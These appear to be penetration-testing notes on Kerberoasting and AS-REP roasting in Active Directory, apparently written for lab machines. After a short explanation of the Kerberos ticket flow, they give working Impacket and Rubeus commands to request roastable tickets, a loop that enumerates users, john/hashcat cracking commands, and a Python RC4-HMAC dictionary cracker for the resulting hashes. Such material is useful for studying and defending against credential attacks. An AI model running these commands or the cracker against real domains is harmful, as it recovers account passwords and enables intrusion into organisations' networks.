When a user logs onto their workstation, their machine sends an AS-REQ message to the Key Distribution Center (KDC), i.e. a Domain Controller, requesting a TGT. With pre-authentication enabled (the default) the request carries a timestamp encrypted with a secret key derived from the user's password (the NT hash for RC4, a PBKDF2-derived key for AES).
The KDC decrypts the timestamp with the key it has stored in Active Directory for that user. Once validated, it returns the TGT in an AS-REP message. The TGT contains the user's identity and is encrypted with the KDC's own secret key (the krbtgt account's key), so the client cannot read or forge it.
When the user attempts to access a resource backed by Kerberos authentication (e.g. a file share), their machine looks up the associated Service Principal Name (SPN). It then requests (TGS-REQ) a service ticket (TGS) for that SPN from the KDC, presenting its TGT as proof that it is an already-authenticated user.
The KDC returns a TGS (TGS-REP) for the service in question to the user, which is then presented to the actual service. The service inspects the TGS and decides whether it should grant the user access or not.
Kerberoasting is a technique for requesting service tickets (TGS) for SPNs that run under domain user accounts and cracking them offline to reveal the account's plaintext password. It works because any authenticated domain user can request a ticket for any SPN, and the ticket is encrypted with the key of the account the service runs as. Machine accounts are not worth targeting (long random passwords); tickets encrypted with RC4 (etype 23) crack far faster than AES (etype 17/18), so tools request RC4 where the account allows it.
Using Impacket
Attack carried out from the attacker machine. The account supplied (here SVC_TGS) only needs to be any valid domain user; you are prompted for its password. -save/-outputfile write the tickets in john/hashcat format.
GetUserSPNs.py -request -dc-ip 10.129.x.x active.htb/SVC_TGS -save -outputfile GetUserSPNs.out
Using Rubeus.exe
Attack carried out from the target machine (upload the binary to the target machine); it runs in the context of the current logon session, so no credentials are needed.
.\Rubeus.exe kerberoast /simple /nowrap
For a specific user (avoids roasting every SPN account and producing a large, noisy set of TGS-REQs):
.\Rubeus.exe kerberoast /user:svc_mssql /nowrap
Take the hash and crack it offline with john (the equivalent hashcat modes are 13100 for RC4 tickets, 19600/19700 for AES128/AES256):
john --format=krb5tgs --wordlist=wordlist hash.txt
If a user account has "Do not require Kerberos preauthentication" set (UF_DONT_REQUIRE_PREAUTH), anyone can send an AS-REQ for that user without proving knowledge of the password. The KDC answers with an AS-REP whose encrypted part is encrypted with the user's key, and that part can be cracked offline to recover their plaintext password.
Using Impacket
GetNPUsers.py EGOTISTICAL-BANK.LOCAL/fsmith -dc-ip 10.129.1.165
(Prompts for a password; just press Enter, or add -no-pass as in the loop below. Add -format john if john rejects the default hashcat-style line.)
For multiple users (one AS-REQ per name; accounts that do require pre-auth just return an error). GetNPUsers.py also accepts -usersfile users.txt for the same purpose.
for user in $(cat users.txt); do GetNPUsers.py -no-pass -dc-ip 10.129.168.220 EGOTISTICAL-BANK.LOCAL/${user} | grep -v Impacket; done
Using Rubeus.exe
.\Rubeus.exe asreproast /user:fsmith /nowrap
Hash cracking (hashcat mode 18200 for the same hash):
john --format=krb5asrep --wordlist=wordlist hash.txt
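Why both the Kerberoast hash and the AS-REP hash above crack offline, shown as an added example that is not part of the original notes and not code from Impacket, Rubeus or john. It implements the RC4-HMAC scheme (RFC 4757, etype 23) that both hash formats encode: the ticket (key usage 2) or AS-REP enc-part (key usage 8) is encrypted under a key that is just MD4(UTF-16LE(password)), the unsalted NT hash, so a cracker derives that key from each wordlist candidate, decrypts, and checks the HMAC-MD5 checksum. The block builds a $krb5tgs$23$ and a $krb5asrep$23$ line from constructed tickets and recovers the password from a wordlist. All usernames, passwords, SPNs and ticket bytes are made up for the demo; MD4 is implemented inline because hashlib's md4 is often unavailable under OpenSSL 3.

```python
"""RC4-HMAC (etype 23) as used by Kerberoast / AS-REP roast hashes. Added demo code."""
import hashlib
import hmac
import os
import struct
from typing import Iterable, Optional, Tuple

MASK = 0xFFFFFFFF
KU_TGS_TICKET = 2   # key usage for the service ticket enc-part (Kerberoast)
KU_AS_REP_ENC = 8   # key usage Microsoft uses for the RC4 AS-REP enc-part


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320)."""
    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):                                   # round 1
            a = _rotl((a + f(b, c, d) + x[i]) & MASK, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                                   # round 2
            a = _rotl((a + g(b, c, d) + x[(i % 4) * 4 + i // 4] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i, k in enumerate((0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)):  # round 3
            a = _rotl((a + h(b, c, d) + x[k] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)


def rc4(key: bytes, data: bytes) -> bytes:
    s = list(range(256))
    j = 0
    for i in range(256):                                      # KSA
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:                                         # PRGA
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def nt_hash(password: str) -> bytes:
    """RC4-HMAC key = NT hash = MD4 of the UTF-16LE password. No salt, no stretching."""
    return md4(password.encode("utf-16-le"))


def _hmac_md5(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.md5).digest()


def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes, confounder: bytes = b"") -> bytes:
    """RFC 4757: edata = checksum(16) || RC4(K3, confounder || plaintext)."""
    confounder = confounder or os.urandom(8)
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    checksum = _hmac_md5(k1, confounder + plaintext)
    k3 = _hmac_md5(k1, checksum)
    return checksum + rc4(k3, confounder + plaintext)


def rc4_hmac_key_matches(key: bytes, usage: int, edata: bytes) -> bool:
    """The per-candidate test a cracker runs: decrypt, then verify the checksum."""
    checksum, ciphertext = edata[:16], edata[16:]
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    k3 = _hmac_md5(k1, checksum)
    return hmac.compare_digest(_hmac_md5(k1, rc4(k3, ciphertext)), checksum)


def kerberoast_line(user: str, realm: str, spn: str, edata: bytes) -> str:
    """$krb5tgs$23$ line as GetUserSPNs.py/Rubeus emit it (john krb5tgs, hashcat 13100)."""
    return f"$krb5tgs$23$*{user}${realm}${spn}*${edata[:16].hex()}${edata[16:].hex()}"


def asrep_line(user: str, realm: str, edata: bytes) -> str:
    """$krb5asrep$23$ line as GetNPUsers.py emits it (john krb5asrep, hashcat 18200)."""
    return f"$krb5asrep$23${user}@{realm}:{edata[:16].hex()}${edata[16:].hex()}"


def parse_hash_line(line: str) -> Tuple[int, bytes]:
    """Return (key usage, checksum || ciphertext) for either RC4 hash line format."""
    if line.startswith("$krb5tgs$23$"):
        usage, body = KU_TGS_TICKET, line.split("*$", 1)[1]
    elif line.startswith("$krb5asrep$23$"):
        usage, body = KU_AS_REP_ENC, line.split(":", 1)[1]
    else:
        raise ValueError("only RC4-HMAC (etype 23) lines are handled here; AES uses PBKDF2 with a salt")
    checksum_hex, edata_hex = body.split("$")
    return usage, bytes.fromhex(checksum_hex + edata_hex)


def crack(line: str, wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: one MD4 + two HMAC-MD5 + one RC4 per candidate."""
    usage, edata = parse_hash_line(line)
    for candidate in wordlist:
        if rc4_hmac_key_matches(nt_hash(candidate), usage, edata):
            return candidate
    return None


if __name__ == "__main__":
    # Constructed demo data (hypothetical accounts/passwords); real enc-parts are ASN.1 blobs.
    tgs = rc4_hmac_encrypt(nt_hash("Ticketmaster1968"), KU_TGS_TICKET, b"<EncTicketPart>")
    asrep = rc4_hmac_encrypt(nt_hash("Thestrokes23"), KU_AS_REP_ENC, b"<EncASRepPart>")
    words = ["Password1", "Thestrokes23", "Ticketmaster1968"]
    print(crack(kerberoast_line("svc_mssql", "ACTIVE.HTB", "MSSQLSvc/dc.active.htb:1433", tgs), words))
    print(crack(asrep_line("fsmith", "EGOTISTICAL-BANK.LOCAL", asrep), words))
```

The only thing that differs between the two attacks at the cracking step is the key-usage constant, which is why john and hashcat expose them as two formats over the same primitive. Because the key is the unsalted NT hash, one wordlist pass covers every RC4 ticket collected, and a cracked Kerberoast password is immediately the account's password. AES tickets (etype 17/18) are deliberately not handled here: their key is PBKDF2-HMAC-SHA1 over the password with the realm and principal as salt and 4096 iterations, which is what makes them so much slower to crack.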